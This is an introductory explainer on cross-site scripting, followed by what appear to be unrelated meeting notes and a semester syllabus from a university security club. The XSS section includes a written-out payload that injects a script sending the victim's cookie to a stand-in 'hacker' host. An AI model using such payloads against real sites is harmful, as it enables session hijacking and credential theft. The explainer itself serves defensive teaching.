Cross-Site Scripting (XSS)

What is it?

Cross-Site Scripting (also known as XSS) is one of the most common application-layer web attacks. XSS vulnerabilities target scripts embedded in a page that are executed on the client side (in the user’s web browser) rather than on the server side. XSS in itself is a threat brought about by the security weaknesses of client-side technologies such as HTML and JavaScript. The concept of XSS is to manipulate the client-side scripts of a web application so that they execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page that is executed every time the page is loaded, or whenever an associated event is performed.

XSS is the most common security vulnerability in software today. This should not be the case as XSS is easy to find and easy to fix. XSS vulnerabilities can have consequences such as tampering and sensitive data theft.

Key Concepts of XSS

  • XSS is a web-based attack performed on vulnerable web applications.
  • In XSS attacks, the victim is the user and not the application.
  • In XSS attacks, malicious content is delivered to users using JavaScript.

Explaining Cross-Site Scripting

An XSS vulnerability arises when web applications take data from users and dynamically include it in web pages without first properly validating the data. XSS vulnerabilities allow an attacker to execute arbitrary commands and display arbitrary content in a victim user’s browser. A successful XSS attack leads to an attacker controlling the victim’s browser or account on the vulnerable web application. Although XSS is enabled by vulnerable pages in a web application, the victims of an XSS attack are the application’s users, not the application itself. The potency of an XSS vulnerability lies in the fact that the malicious code executes in the context of the victim’s session, allowing the attacker to bypass normal security restrictions.

XSS Attack Examples

Reflective XSS

There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim’s browser and sent to the vulnerable web application. The malicious JavaScript is then reflected back to the victim’s browser, where it is executed in the context of the victim user’s session.

Stored XSS

Consider a web application that allows users to enter a username that is displayed on each user’s profile page. The application stores each username in a local database. A malicious user notices that the web application fails to sanitize the username field and inputs malicious JavaScript code as part of their username. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session.

Impact of Cross-Site Scripting

When attackers succeed in exploiting XSS vulnerabilities, they can gain access to account credentials. They can also spread web worms or access the user’s computer and view the user’s browser history or control the browser remotely. After gaining control of the victim’s system, attackers can also analyze and use other intranet applications.

By exploiting XSS vulnerabilities, an attacker can perform malicious actions, such as:

  • Hijack an account.
  • Spread web worms.
  • Access browser history and clipboard contents.
  • Control the browser remotely.
  • Scan and exploit intranet appliances and applications.

Identifying Cross-Site Scripting Vulnerabilities

XSS vulnerabilities may occur if:

  • Input coming into web applications is not validated
  • Output to the browser is not HTML encoded

XSS Examples

Example 1.

Consider the HTML snippet:

<title>Example document: %(title)</title>

It is intended to illustrate a template snippet that, if the variable title has the value XSS Doc, results in the following HTML being emitted to the browser:

<title>Example document: XSS Doc</title>

Now suppose a site with a search field lacks proper input sanitizing. By crafting a search query looking something like this:

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

the web server sitting at the other end will receive hits in which the user’s cookie follows a double space. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.

First Meeting – 8/21/2020

What is DevilSec?

DevilSec is a cyber security club based at Arizona State University (ASU) whose sole purpose is to better equip students for their future careers in the many professions of cyber security. We provide hands-on education and training in ethical hacking, network security, penetration testing, network administration, and systems security.

What do you plan on teaching this semester?

Week 0: Introduction to DevilSec

Week 1: Linux OS & General Setup

Week 2: Enumeration / Recon

Week 3: Guest Speaker – TBD

Week 4: Privilege Escalation Techniques

Week 5: Identifying security vulnerabilities in web applications (LFI/RFI, File upload, SQL injection, XSS, etc)

Week 6: Guest Speaker – TBD 

Week 7: Running a successful Phishing campaign

Week 8: Live Fire – Red Vs Blue Team 

Week 9: Open Source Intelligence Gathering

Week 10: Finding vulnerabilities in iOS applications

Week 11: Active Directory Exploitation (Matt’s Favorite)

Week 12: Guest Speaker – TBD

Week 13: Live Fire – Red Vs Blue Team

Week 14: Semester Wrap up

What is Penetration Testing?

A penetration test is an authorized simulated cyber attack on a computer system.

It generally goes Recon -> Exploitation -> Privilege Escalation -> Persistence

What Competitions do you do?

  • Live-Fire Competition
    • DevilSec hosts a few live-fire competitions each year
  • CCDC
    • Collegiate Cyber Defense Competition 
  • CPTC
    • Collegiate Penetration Testing Competition
  • Hivestorm
    • Blue teaming on steroids. Meant for IT students.

What do I need to get started?

Check out this page on how to get started!